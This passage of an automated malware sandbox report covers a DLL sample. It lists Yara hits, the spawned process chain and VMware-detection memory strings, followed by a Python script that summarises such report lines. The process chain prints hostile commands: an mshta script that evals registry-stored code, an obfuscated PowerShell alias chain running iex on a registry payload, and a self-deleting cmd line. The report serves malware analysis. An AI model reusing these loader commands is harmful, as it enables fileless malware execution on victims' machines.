Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: Yara match | File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll" |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll",#1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll",#1 |
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Soxq='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Soxq).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gjvyfiw -value gp; new-alias -name huwuvwioi -value iex; huwuvwioi ([System.Text.Encoding]::ASCII.GetString((gjvyfiw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hvnxdzw.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE3E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1476D44366854E63BD1CA8712B7CCE92.TMP" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iig1japh.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B5B.tmp" "c:\Users\user\AppData\Local\Temp\CSC8E8486282EA843C08CB8749684F1E69.TMP" |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\3r0Cgcbr8c.dll |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: explorer.exe, 0000001A.00000000.412668542.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d |
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n |
Source: explorer.exe, 0000001A.00000000.423556966.0000000000680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _VMware_SATA_CD00#5&280b647& |
Source: explorer.exe, 0000001A.00000000.404550743.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00 |
Source: RuntimeBroker.exe, 00000020.00000000.597070582.000001C95EA58000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}so |
Source: explorer.exe, 0000001A.00000000.411765907.00000000062C4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 0000001A.00000000.402898816.0000000004287000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0 |
Source: explorer.exe, 0000001A.00000000.434857653.000000000820E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000 |
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^ |
Source: explorer.exe, 0000001A.00000000.412668542.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 |
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00l |
Source: explorer.exe, 0000001A.00000000.423589479.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.400779619.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.404531568.0000000000688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanEXE^ |
Source: explorer.exe, 0000001A.00000000.404600031.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.417672396.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd |
Source: explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.424082918.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.404910870.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman |
Source: explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.424082918.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.404910870.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock |
Source: explorer.exe, 0000001A.00000000.425893659.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.400809333.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.404550743.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd4 |
Source: explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.424082918.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.404910870.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: WProgram Manager |
Source: Yara match | File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
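Added illustration, not part of the report and not the sandbox vendor's tooling: the evidence above comes in three shapes, repeated process-information lines, memory strings tagged with the .sdmp dump they were read from, and Yara hits that name the same process in three different ways (a memory dump, a PID, an unpacked PE). The script parses that "Source: X | detail |" line format, collapses verbatim repeats with a count, flags the VMware device paths (treating the Ven_Msft Virtual DVD-ROM entry as ambiguous, because Windows' own ISO mounting creates the same device on physical hardware), and groups the Yara hits by process. The reading of the .sdmp name fields (first dotted field = sandbox process index, fourth = dump base address) is an assumption inferred from the "2.3.rundll32.exe..." unpack names lining up with the 00000002.* dumps; the sample lines are constructed in the report's format.

```python
"""Summarise sandbox evidence lines of the form "Source: X | detail |".

Added example, not part of the report or of any sandbox vendor's tooling.
Assumption: in a name such as
0000001A.00000000.412668542.00000000080ED000.00000004.00000001.00020000.00000000.sdmp
the first dotted field is the sandbox's process index and the fourth the dump's
base address (inferred from "2.3.rundll32.exe..." lining up with 00000002.* dumps).
"""
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(r"^Source:\s*(?P<source>.*?)\s*\|\s*(?P<detail>.*?)\s*\|\s*$")
DUMP_RE = re.compile(
    r"\b([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.([0-9A-Fa-f]{16})\.(?:[0-9A-Fa-f]{8}\.){4}sdmp\b")
PID_RE = re.compile(r"Process Memory Space: (\S+) PID: (\d+)")
UNPACK_RE = re.compile(r"File source: (\d+)\.\d+\.([^.\s]+\.(?:exe|dll))\.")
TYPE_RE = re.compile(r"type: (\w+)")

# Lower-cased substrings that only a VMware guest exposes in device paths.
VM_MARKERS = ("vmware", "necvmwar")
# Also created by Windows' built-in ISO mounting on physical hosts: not a tell on its own.
AMBIGUOUS_MARKERS = ("ven_msft&prod_virtual_dvd-rom",)

# Constructed sample in the report's line format (a subset, with one repeat).
SAMPLE_REPORT = r"""
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: explorer.exe, 0000001A.00000000.412668542.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: Yara match | File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE |
"""


def parse_lines(text):
    """One record per well-formed line; anything else (blank, truncated) is skipped."""
    records = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            records.append({"source": m.group("source"), "detail": m.group("detail"), "raw": raw.strip()})
    return records


def dedupe(records):
    """Collapse verbatim repeats, keeping first-seen order and a repeat count."""
    counts = Counter(r["raw"] for r in records)
    seen, out = set(), []
    for r in records:
        if r["raw"] not in seen:
            seen.add(r["raw"])
            out.append((r["raw"], counts[r["raw"]]))
    return out


def vm_indicators(records):
    """Memory strings pointing at a VMware guest, with the dump they were read from."""
    hits = []
    for r in records:
        if not r["detail"].startswith("Binary or memory string:"):
            continue
        low = r["detail"].lower()
        strong = any(m in low for m in VM_MARKERS)
        weak = any(m in low for m in AMBIGUOUS_MARKERS)
        if not (strong or weak):
            continue
        dump = DUMP_RE.search(r["source"])
        hits.append({
            "process": r["source"].split(",")[0].strip(),
            "process_index": int(dump.group(1), 16) if dump else None,  # assumed field meaning
            "base": int(dump.group(2), 16) if dump else None,           # assumed field meaning
            "strong": strong,
        })
    return hits


def yara_by_process(records):
    """Group 'Yara match' lines by process across the dump, PID and unpacked-PE forms."""
    groups = defaultdict(list)
    for r in records:
        if r["source"] != "Yara match":
            continue
        d = r["detail"]
        kind = TYPE_RE.search(d).group(1) if TYPE_RE.search(d) else "?"
        if (m := DUMP_RE.search(d)):
            key = f"index {int(m.group(1), 16)}"
        elif (m := PID_RE.search(d)):
            key = f"pid {m.group(2)} ({m.group(1)})"
        elif (m := UNPACK_RE.search(d)):
            key = f"index {int(m.group(1))}"
        else:
            key = "unknown"
        groups[key].append(kind)
    return dict(groups)


if __name__ == "__main__":
    recs = parse_lines(SAMPLE_REPORT)
    for line, n in dedupe(recs):
        print(f"x{n} {line[:70]}")
    for h in vm_indicators(recs):
        print("VM artefact" if h["strong"] else "ambiguous", h["process"], h["process_index"], h["base"])
    for key, kinds in sorted(yara_by_process(recs).items()):
        print("yara", key, kinds)
```

The PID-keyed Yara entries are kept separate from the index-keyed ones on purpose: the report gives no mapping from sandbox process index to Windows PID, so merging "index 2" with "pid 6488 (rundll32.exe)" would be a guess, even though the unpack names make it likely.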